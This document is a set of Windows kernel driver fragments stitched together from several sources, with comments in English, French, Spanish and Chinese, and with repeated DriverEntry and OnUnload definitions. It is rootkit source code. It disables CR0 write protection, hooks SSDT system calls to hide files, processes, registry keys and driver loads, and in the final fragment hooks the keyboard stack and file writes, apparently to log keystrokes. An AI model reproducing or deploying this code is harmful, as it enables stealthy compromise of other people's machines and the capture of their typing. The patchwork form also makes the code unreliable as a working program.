VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
DbgPrint("Rootkit: OnUnload called\n");
// UNProtect memory
__asm
{
push eax
mov eax, CR0
and eax, 0FFFEFFFFh
mov CR0, eax
pop eax
}
// put back the old function pointer
InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile),
(LONG) OldZwQueryDirectoryFile);
InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQuerySystemInformation),
(LONG) OldZwQuerySystemInformation);
// REProtect memory
__asm
{
push eax
mov eax, CR0
or eax, NOT 0FFFEFFFFh
mov CR0, eax
pop eax
}
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
int i;
DbgPrint("My Driver Loaded!");
GetProcessNameOffset();
// Register a dispatch function
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
{
theDriverObject->MajorFunction[i] = OnStubDispatch;
}
theDriverObject->DriverUnload = OnUnload;
// save old system call locations
OldZwQueryDirectoryFile=(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
// hook system calls
_asm cli
(ZWQUERYDIRECTORYFILE) (SYSTEMSERVICE(ZwQueryDirectoryFile))= NewZwQueryDirectoryFile;
(ZWQUERYSYSTEMINFORMATION) (SYSTEMSERVICE(ZwQuerySystemInformation))= NewZwQuerySystemInformation;
_asm sti
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
DbgPrint("--- LOAD - HOOK ---");
pDriverObject->DriverUnload = unload;
TrueZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) SYSTEMSERVICE(ZwQuerySystemInformation);
DbgPrint("ZwQuerySystemInformation okay");
__asm
{
push eax // on sauvegarde eax
mov eax, CR0 // on met la valeur de CR0 dans eax
and eax, 0FFFEFFFFh // on applique le filtre inverseur
mov CR0, eax // on change la valeur de CR0
pop eax
}
DbgPrint("CR0 trick OK");
SYSTEMSERVICE(ZwQuerySystemInformation) = (unsigned long*) MyZwQuerySystemInformation;
__asm
{
push eax
mov eax, CR0
or eax, NOT 0FFFEFFFFh // l’opération inverse de tout à l’heure pour récupérer l’état de CR0 comme il était avant le hook
mov CR0, eax
pop eax // on récupère eax
}
DbgPrint("CR0 trick 2 OK");
DbgPrint("--- HOOK OK ---");
return STATUS_SUCCESS;
}
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
DbgPrint("ROOTKIT: OnUnload called\n");
// unhook system calls
_asm cli
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) =OldZwQueryDirectoryFile;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
_asm sti
}
void unHookSSDT()
{
DbgPrint("--- UNHOOKING ---");
__asm
{
push eax // on sauvegarde eax
mov eax, CR0 // on met la valeur de CR0 dans eax
and eax, 0FFFEFFFFh // on applique le filtre inverseur
mov CR0, eax // on change la valeur de CR0
pop eax
}
DbgPrint("CR0 trick OK");
SYSTEMSERVICE(ZwQuerySystemInformation) = (ULONG *) TrueZwQuerySystemInformation;
__asm
{
push eax
mov eax, CR0
or eax, NOT 0FFFEFFFFh // l’opération inverse de tout à l’heure pour récupérer l’état de CR0 comme il était avant le hook
mov CR0, eax
pop eax // on récupère eax
}
DbgPrint("CR0 trick 2 OK");
DbgPrint("--- UNHOOKING OK ---");
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
DbgPrint("Rootkit: WE ARE ALIVE! Start hiding files.\n");
GetProcessNameOffset();
theDriverObject->DriverUnload = OnUnload;
// UNProtect memory
__asm
{
push eax
mov eax, CR0
and eax, 0FFFEFFFFh
mov CR0, eax
pop eax
}
// place the hook using InterlockedExchange (no need to disable interrupts)
// this uses the LOCK instruction to lock the memory bus during the next instruction
// Example:
// LOCK INC DWORD PTR [EDX+04]
// This staves off collisions on multi-processor machines, while cli/sti only disable interrupts
// on the current processor.
//
OldZwQueryDirectoryFile =
(ZWQUERYDIRECTORYFILE) InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile),
(LONG) NewZwQueryDirectoryFile);
DbgPrint("%x",(PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile));
OldZwQuerySystemInformation =
(ZWQUERYSYSTEMINFORMATION) InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQuerySystemInformation),
(LONG) NewZwQuerySystemInformation);
//add hide reg&files
// REProtect memory
__asm
{
push eax
mov eax, CR0
or eax, NOT 0FFFEFFFFh
mov CR0, eax
pop eax
}
return STATUS_SUCCESS;
}
/**
* 设置钩子函数
*
*/
NTSTATUS sstHook_OpenProcess()
{
if(m_MDL == NULL)
{
m_MDL = MmCreateMdl(NULL,KeServiceDescriptorTable->ServiceTableBase,KeServiceDescriptorTable->NumberOfService*4);
if(!m_MDL)
return STATUS_UNSUCCESSFUL;
MmBuildMdlForNonPagedPool(m_MDL);
m_MDL->MdlFlags = m_MDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
m_Mapped = (PVOID *)MmMapLockedPages(m_MDL, KernelMode);
HOOK_SYSCALL(ZwOpenProcess,MyNtOpenProcess,pOriNtOpenProcess);
g_openProcessId = (ULONG)SYSTEMSERVICE(ZwOpenProcess);
return STATUS_SUCCESS;
}
UpdateService(SYSCALL_INDEX(ZwOpenProcess),(PVOID)MyNtOpenProcess);
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING theRegistryPath)
{
DriverObject->DriverUnload = OnUnload;
DbgPrint("Driver cargado");
ZwOpenProcessIni =(TypZwOpenProc)(SYSTEMSERVICE(ZwOpenProcess));
//Creamos la MDL para deshabilitar la protección de memoria
g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
if(!g_pmdlSystemCall)
return STATUS_UNSUCCESSFUL;
MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
DbgPrint("Hookeando...");
HOOK_SYSCALL( ZwOpenProcess, NewZwOpenProcess, ZwOpenProcessIni );
return STATUS_SUCCESS;
}
//------------------------------------------------------------------------------------
NTSTATUS HookApi()
{
SMFile posFile ;
LARGE_INTEGER u64FileSize ;
LARGE_INTEGER u64CurrentOffset;
char strImageName[260];
ANSI_STRING TempImageName ;
g_uPidList = 0 ;
if ( !NT_SUCCESS(UnProtectSSDT(&MappedSystemCallTable) ) )
{
return STATUS_UNSUCCESSFUL;
}
if ( !NT_SUCCESS (SMCreateFileForRead ( &posFile , L"\\??\\C:\\Warm.txt")) )
{
return STATUS_UNSUCCESSFUL;
}
if ( !NT_SUCCESS (SMGetFileLength ( &posFile , &u64FileSize )) )
{
SMCloseFile(&posFile);
return STATUS_UNSUCCESSFUL;
}
if ( !NT_SUCCESS(SMReadFile( &posFile , strImageName , &u64FileSize.LowPart )))
{
SMCloseFile(&posFile);
return STATUS_UNSUCCESSFUL;
}
SMCloseFile(&posFile);
strImageName[min(u64FileSize.LowPart,sizeof (strImageName)-1)] = '\0';
RtlInitAnsiString (&TempImageName,strImageName);
if ( !NT_SUCCESS(RtlAnsiStringToUnicodeString (&g_uniImageName,&TempImageName,TRUE)))
{
return STATUS_UNSUCCESSFUL;
}
PsSetLoadImageNotifyRoutine ( LoadImageNotify );
PsSetCreateProcessNotifyRoutine(CreateProcessNotify , FALSE);
oldZwCreateKey = (ZWCREATEKEY)(SYSTEMSERVICE(ZwCreateKey));
HOOK_SYSCALL (ZwCreateKey , newZwCreateKey ,oldZwCreateKey );
oldZwDeleteKey = (ZWDELETEKEY)(SYSTEMSERVICE(ZwDeleteKey));
HOOK_SYSCALL (ZwDeleteKey , newZwDeleteKey ,oldZwDeleteKey );
oldZwEnumerateKey = (ZWENUMERATEKEY)(SYSTEMSERVICE(ZwEnumerateKey));
HOOK_SYSCALL (ZwEnumerateKey , newZwEnumerateKey ,oldZwEnumerateKey );
oldZwEnumerateValueKey = (ZWENUMERATEVALUEKEY)(SYSTEMSERVICE(ZwEnumerateValueKey));
HOOK_SYSCALL (ZwEnumerateValueKey , newZwEnumerateValueKey ,oldZwEnumerateValueKey );
oldZwOpenKey = (ZWOPENKEY)(SYSTEMSERVICE(ZwOpenKey));
HOOK_SYSCALL (ZwOpenKey , newZwOpenKey ,oldZwOpenKey);
oldZwQueryValueKey = (ZWQUERYVALUEKEY)(SYSTEMSERVICE(ZwQueryValueKey));
HOOK_SYSCALL (ZwQueryValueKey , newZwQueryValueKey ,oldZwQueryValueKey);
oldZwSetValueKey = (ZWSETVALUEKEY)(SYSTEMSERVICE(ZwSetValueKey));
HOOK_SYSCALL (ZwSetValueKey , newZwSetValueKey ,oldZwSetValueKey);
oldZwNotifyChangeKey = (ZWNOTIFYCHANGEKEY)(SYSTEMSERVICE(ZwNotifyChangeKey));
HOOK_SYSCALL (ZwNotifyChangeKey , newZwNotifyChangeKey ,oldZwNotifyChangeKey);
oldZwLoadDriver = (ZWLOADDRIVER)(SYSTEMSERVICE(ZwLoadDriver));
HOOK_SYSCALL (ZwLoadDriver , newZwLoadDriver ,oldZwLoadDriver);
oldZwUnloadDriver = (ZWUNLOADDRIVER)(SYSTEMSERVICE(ZwUnloadDriver));
HOOK_SYSCALL (ZwUnloadDriver , newZwUnloadDriver ,oldZwUnloadDriver);
oldZwOpenProcess = (ZWOPENPROCESS)(SYSTEMSERVICE(ZwOpenProcess));
HOOK_SYSCALL (ZwOpenProcess , newZwOpenProcess,oldZwOpenProcess);
oldZwOpenSection = (ZWOPENSECTION)(SYSTEMSERVICE(ZwOpenSection));
HOOK_SYSCALL (ZwOpenSection , newZwOpenSection,oldZwOpenSection);
oldZwMapViewOfSection = (ZWMAPVIEWOFSECTION)(SYSTEMSERVICE(ZwMapViewOfSection));
HOOK_SYSCALL (ZwMapViewOfSection , newZwMapViewOfSection, oldZwMapViewOfSection);
oldZwCreateSection = (ZWCREATESECTION)(SYSTEMSERVICE(ZwCreateSection));
HOOK_SYSCALL (ZwCreateSection , newZwCreateSection, oldZwCreateSection);
oldZwCreateFile = (ZWCREATEFILE)(SYSTEMSERVICE(ZwCreateFile));
HOOK_SYSCALL (ZwCreateFile , newZwCreateFile, oldZwCreateFile);
oldZwDeleteFile = (ZWDELETEFILE)(SYSTEMSERVICE(ZwDeleteFile));
HOOK_SYSCALL (ZwDeleteFile , newZwDeleteFile, oldZwDeleteFile);
oldZwOpenFile = (ZWOPENFILE)(SYSTEMSERVICE(ZwOpenFile));
HOOK_SYSCALL (ZwOpenFile , newZwOpenFile, oldZwOpenFile);
oldZwQueryVolumeInformationFile = (ZWQUERYVOLUMEINFORMATIONFILE)(SYSTEMSERVICE(ZwQueryVolumeInformationFile));
HOOK_SYSCALL (ZwQueryVolumeInformationFile , newZwQueryVolumeInformationFile, oldZwQueryVolumeInformationFile);
oldZwSetVolumeInformationFile = (ZWSETVOLUMEINFORMATIONFILE)(SYSTEMSERVICE(ZwSetVolumeInformationFile));
HOOK_SYSCALL (ZwSetVolumeInformationFile , newZwSetVolumeInformationFile, oldZwSetVolumeInformationFile);
oldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
HOOK_SYSCALL (ZwQueryDirectoryFile , newZwQueryDirectoryFile, oldZwQueryDirectoryFile);
oldZwFsControlFile = (ZWFSCONTROLFILE)(SYSTEMSERVICE(ZwFsControlFile));
HOOK_SYSCALL (ZwFsControlFile , newZwFsControlFile, oldZwFsControlFile);
oldZwDeviceIoControlFile = (ZWDEVICEIOCONTROLFILE)(SYSTEMSERVICE(ZwDeviceIoControlFile));
HOOK_SYSCALL (ZwDeviceIoControlFile , newZwDeviceIoControlFile, oldZwDeviceIoControlFile);
oldZwReadFile = (ZWREADFILE)(SYSTEMSERVICE(ZwReadFile));
HOOK_SYSCALL (ZwReadFile , newZwReadFile, oldZwReadFile);
return STATUS_SUCCESS;
}
bool _checkHookSafeOpenP()
{
return (g_openProcessId == (ULONG)SYSTEMSERVICE(ZwOpenProcess)) ? true : false ;
}
/*
* DriverEntry initializes the driver and is the first routine called by the
* system after the driver is loaded. DriverEntry specifies the other entry
* points in the function driver, such as EvtDevice and DriverUnload.
*
* @param DriverObject - represents the instance of the function driver that is loaded
* into memory. DriverEntry must initialize members of DriverObject before it
* returns to the caller. DriverObject is allocated by the system before the
* driver is loaded, and it is released by the system after the system unloads
* the function driver from memory.
* @param RegistryPath - represents the driver specific path in the Registry.
* The function driver can use the path to store driver related data between
* reboots. The path does not store hardware instance specific data.
*
* @return STATUS_SUCCESS if successful, STATUS_UNSUCCESSFUL otherwise
*/
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING RegistryPath
)
{
// Local variables
NTSTATUS status;
PDEVICE_EXTENSION devExt;
PDEVICE_OBJECT devObj;
UNICODE_STRING devName;
UNICODE_STRING linkName;
int counter;
DbgPrint("%s - version %s", NAME, VERSION);
DbgPrint("Built %s %s\n", __DATE__, __TIME__);
// Set the basic dispatch routines for all IRPs handled
for (counter = 0; counter < IRP_MJ_MAXIMUM_FUNCTION; counter++)
{
pDriverObject->MajorFunction[counter] = OutboundDispatchPassDown;
}
// Set a specific dispatch routine for read requests
pDriverObject->MajorFunction[IRP_MJ_READ] = OutboundDispatchRead;
// Hook the keyboard stack
status = OutboundHookKeyboard(pDriverObject);
if (!NT_SUCCESS(status))
DbgPrint("Error hooking the keyboard.\n");
else
DbgPrint("Successfully hooked the keyboard.\n");
// Save old system call locations
OldZwWriteFile = (ZWWRITEFILE)(SYSTEMSERVICE(ZwWriteFile));
OldZwCreateFile = (ZWCREATEFILE)(SYSTEMSERVICE(ZwCreateFile));
//***Begin HideProcessHookMDL SSDT hook code***
// Map the memory into our domain so we can change the permissions on the MDL.
g_pmdlSystemCall = MmCreateMdl(NULL,
KeServiceDescriptorTable.ServiceTableBase,
KeServiceDescriptorTable.NumberOfServices * 4);
if(!g_pmdlSystemCall)
{
DbgPrint("Failed mapping memory...");
return STATUS_UNSUCCESSFUL;
}
MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
// Change the flags of the MDL
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode); //TODO: use MmMapLockedPagesSpecifyCache instead, MmMapLockedPages is obselete according to OACR
// Hook the system call
_asm{cli}
HOOK_SYSCALL(ZwWriteFile, NewZwWriteFile, OldZwWriteFile);
HOOK_SYSCALL(ZwCreateFile, NewZwCreateFile, OldZwCreateFile);
_asm{sti}
//***End HideProcessHookMDL SSDT hook code***
// Set the driver unload routine
pDriverObject->DriverUnload = Unload;
return STATUS_SUCCESS;
} // DriverEntry
